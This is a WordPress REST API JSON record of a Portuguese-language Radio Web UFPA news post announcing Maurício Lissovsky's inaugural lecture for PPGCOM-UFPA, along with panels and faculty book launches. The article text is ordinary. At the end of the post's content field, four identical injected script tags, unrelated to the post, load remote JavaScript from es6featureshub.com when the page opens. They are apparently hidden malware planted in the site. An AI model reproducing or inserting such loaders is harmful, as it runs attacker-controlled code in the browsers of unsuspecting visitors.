{"id":10008,"date":"2022-03-30T14:46:39","date_gmt":"2022-03-30T17:46:39","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=10008"},"modified":"2025-10-21T13:20:32","modified_gmt":"2025-10-21T16:20:32","slug":"mauricio-lissovsky","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/","title":{"rendered":"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA"},"content":{"rendered":"\n<p>Rivais at\u00e9 o \u00faltimo clique? Modernidade e Fotografia em M\u00e1rio de Andrade e Monteiro Lobato. Esse \u00e9 o t\u00edtulo da aula magna que abre o semestre letivo do Programa de P\u00f3s-Gradua\u00e7\u00e3o em Comunica\u00e7\u00e3o, Cultura e Amaz\u00f4nia (PPGCOM-UFPA), nesta quinta-feira, 31 de mar\u00e7o, \u00e0s 16 horas, com transmiss\u00e3o ao vivo pelo canal do youtube do PPGCOM-UFPA. O convidado \u00e9 o &nbsp;historiador, redator e roteirista, Dr. Maur\u00edcio Lissovsky,&nbsp; pesquisador do CNPq e professor do Programa de P\u00f3s-gradua\u00e7\u00e3o em Comunica\u00e7\u00e3o e Cultura da UFRJ.<\/p>\n\n\n\n<p>Com o t\u00edtulo da aula magna, Maur\u00edcio Lissovsky pretende abordar as rela\u00e7\u00f5es entre literatura e fotografia a partir da obra de escritores-fot\u00f3grafos. Organizado pelo Programa de P\u00f3s-Gradua\u00e7\u00e3o em Comunica\u00e7\u00e3o, Cultura e Amaz\u00f4nia, com apoio da Faculdade de Comunica\u00e7\u00e3o e do Instituto de Letras e Comunica\u00e7\u00e3o da UFPA, o evento, com espa\u00e7o para di\u00e1logo e debate ao final, vai contar com a &nbsp;com a participa\u00e7\u00e3o do professor e pesquisador do Programa, Dr. F\u00e1bio Fonseca de Castro, como debatedor.<\/p>\n\n\n\n<p>Nesta quarta (30), a partir das 14h30, o PPGCOM-UFPA preparou um evento especial para a divulga\u00e7\u00e3o e lan\u00e7amento de livros do corpo docente e convidados. Ser\u00e3o duas mesas de apresenta\u00e7\u00e3o, conforme programa\u00e7\u00e3o abaixo. Na ocasi\u00e3o ser\u00e3o vendidos exemplares dos livros impressos, al\u00e9m de sorteio entre os presentes. Confiram as informa\u00e7\u00f5es abaixo:<\/p>\n\n\n\n<p><strong>30\/03 &#8211; MESAS ACAD\u00caMICAS E LAN\u00c7AMENTOS DE LIVROS<\/strong><\/p>\n\n\n\n<p>Local: Audit\u00f3rio do ILC (Em frente ao Gin\u00e1sio da UFPA. Pr\u00f3ximo port\u00e3o 2 da UFPA)<\/p>\n\n\n\n<p><strong>14h30 &#8211; Mesa &#8220;Narrativas e viol\u00eancia colonial na Amaz\u00f4nia&#8221;<\/strong><\/p>\n\n\n\n<p>Prof. Dr. Otac\u00edlio Amaral Filho \/ Prof. Dr. F\u00e1bio Hor\u00e1cio-Castro \/ Profa. Dra. Alda Cristina Costa \/Profa. Dra. C\u00e9lia Trindade Amorim \/ Profa. Dra. Ivana Guimar\u00e3es (Unama)\/ Profa. Dra. V\u00e2nia Torres Costa\/ Prof. Dr. Paulo Nunes (Unama)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p><strong>16h30 &#8211; Mesa &#8220;Comunica\u00e7\u00e3o, pol\u00edtica e afetos&#8221;<\/strong><\/p>\n\n\n\n<p>Profa. Dra. Danila Cal \/ Profa. Dra. Rosaly Brito\/ Profa. Dra. Kalynka Cruz-Stefani \/ Profa. Dra. Net\u00edlia Seixas\/ Prof. Dr. Leandro Lage<\/p>\n\n\n\n<p><strong>18h &#8211; LAN\u00c7AMENTO DE LIVROS<\/strong><\/p>\n\n\n\n<p>Local: Audit\u00f3rio do ILC (Em frente ao Gin\u00e1sio)<\/p>\n\n\n\n<p>&#8211; Livro &#8220;Comunica\u00e7\u00e3o, G\u00eanero e Trabalho Dom\u00e9stico: das reitera\u00e7\u00f5es coloniais \u00e0 inven\u00e7\u00e3o de outros poss\u00edveis&#8221;. Danila Cal e Rosaly Brito (Orgs.)<\/p>\n\n\n\n<p>&#8211; Livro (e-book) &#8220;O Medo \u00e9 a Mensagem: Narrativas Midi\u00e1ticas na Amaz\u00f4nia Paraense&#8221;. Alda Cristina Costa, C\u00e9lia Trindade Amorim e Ivana Guimar\u00e3es (Orgs.)<\/p>\n\n\n\n<p>&#8211; Livro &#8220;Imagens da resist\u00eancia: dimens\u00f5es est\u00e9ticas e pol\u00edticas&#8221;. Leandro Lage (Org.)<\/p>\n\n\n\n<p>&#8211; Livro &#8220;O r\u00e9ptil melanc\u00f3lico&#8221;. F\u00e1bio Hor\u00e1cio-Castro<\/p>\n\n\n\n<p>-Livro &#8220;Amor complexo e o Ciberespa\u00e7o&#8221;. Kalynka Cruz-Stefani<\/p>\n\n\n\n<p>-Livro &#8220;Os Filhos Bastardos de Luzanira&#8221;. Otac\u00edlio Amaral Filho<\/p>\n\n\n\n<p>-Livro &#8220;Um olho no peixe frito e outro na&#8230;: colet\u00e2nea de artigos sobre a Academia do Peixe Frito&#8221;. Paulo Nunes, V\u00e2nia Torres Costa, Elaine Ferreira de Oliveira e K\u00e1tia Silva (Orgs.)<\/p>\n\n\n\n<p>-Livro &#8220;Narr&#8217;Amaz\u00f4nia: modos de ser e estar no mundo&#8221;. Alda Cristina Costa, Paulo Nunes e V\u00e2nia Maria Torres Costa (Orgs.)\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/p>\n\n\n\n<p> &#8211; Livro (e-book) &#8220;Jovens em redes sociot\u00e9cnicas: aspectos m\u00faltiplos&#8221;. Nilda Jacks, Net\u00edlia Silva dos Anjos Seixas, Vitor Braga (Orgs.)<\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/\" aria-label=\"Read more about Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":10009,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[696],"tags":[],"class_list":["post-10008","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-noticias"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA. Modernidade e Fotografia em M\u00e1rio de Andrade e Monteiro Lobato\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA. Modernidade e Fotografia em M\u00e1rio de Andrade e Monteiro Lobato\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2022-03-30T17:46:39+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:20:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"421\" \/>\n\t<meta property=\"og:image:height\" content=\"349\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA\",\"datePublished\":\"2022-03-30T17:46:39+00:00\",\"dateModified\":\"2025-10-21T16:20:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/\"},\"wordCount\":671,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1\",\"articleSection\":[\"UFPA Not\u00edcias\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/\",\"name\":\"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1\",\"datePublished\":\"2022-03-30T17:46:39+00:00\",\"dateModified\":\"2025-10-21T16:20:32+00:00\",\"description\":\"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA. Modernidade e Fotografia em M\u00e1rio de Andrade e Monteiro Lobato\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1\",\"width\":421,\"height\":349},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA - Radio Web UFPA","description":"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA. Modernidade e Fotografia em M\u00e1rio de Andrade e Monteiro Lobato","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/","og_locale":"pt_BR","og_type":"article","og_title":"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA - Radio Web UFPA","og_description":"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA. Modernidade e Fotografia em M\u00e1rio de Andrade e Monteiro Lobato","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2022-03-30T17:46:39+00:00","article_modified_time":"2025-10-21T16:20:32+00:00","og_image":[{"width":421,"height":349,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA","datePublished":"2022-03-30T17:46:39+00:00","dateModified":"2025-10-21T16:20:32+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/"},"wordCount":671,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1","articleSection":["UFPA Not\u00edcias"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/","name":"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1","datePublished":"2022-03-30T17:46:39+00:00","dateModified":"2025-10-21T16:20:32+00:00","description":"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA. Modernidade e Fotografia em M\u00e1rio de Andrade e Monteiro Lobato","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1","width":421,"height":349},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/mauricio-lissovsky\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Maur\u00edcio Lissovsky ministra aula magna do PPGCOM-UFPA"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/03\/lissovsky1.jpg?fit=421%2C349&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2Bq","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10008","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=10008"}],"version-history":[{"count":14,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10008\/revisions"}],"predecessor-version":[{"id":17898,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10008\/revisions\/17898"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/10009"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=10008"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=10008"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=10008"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}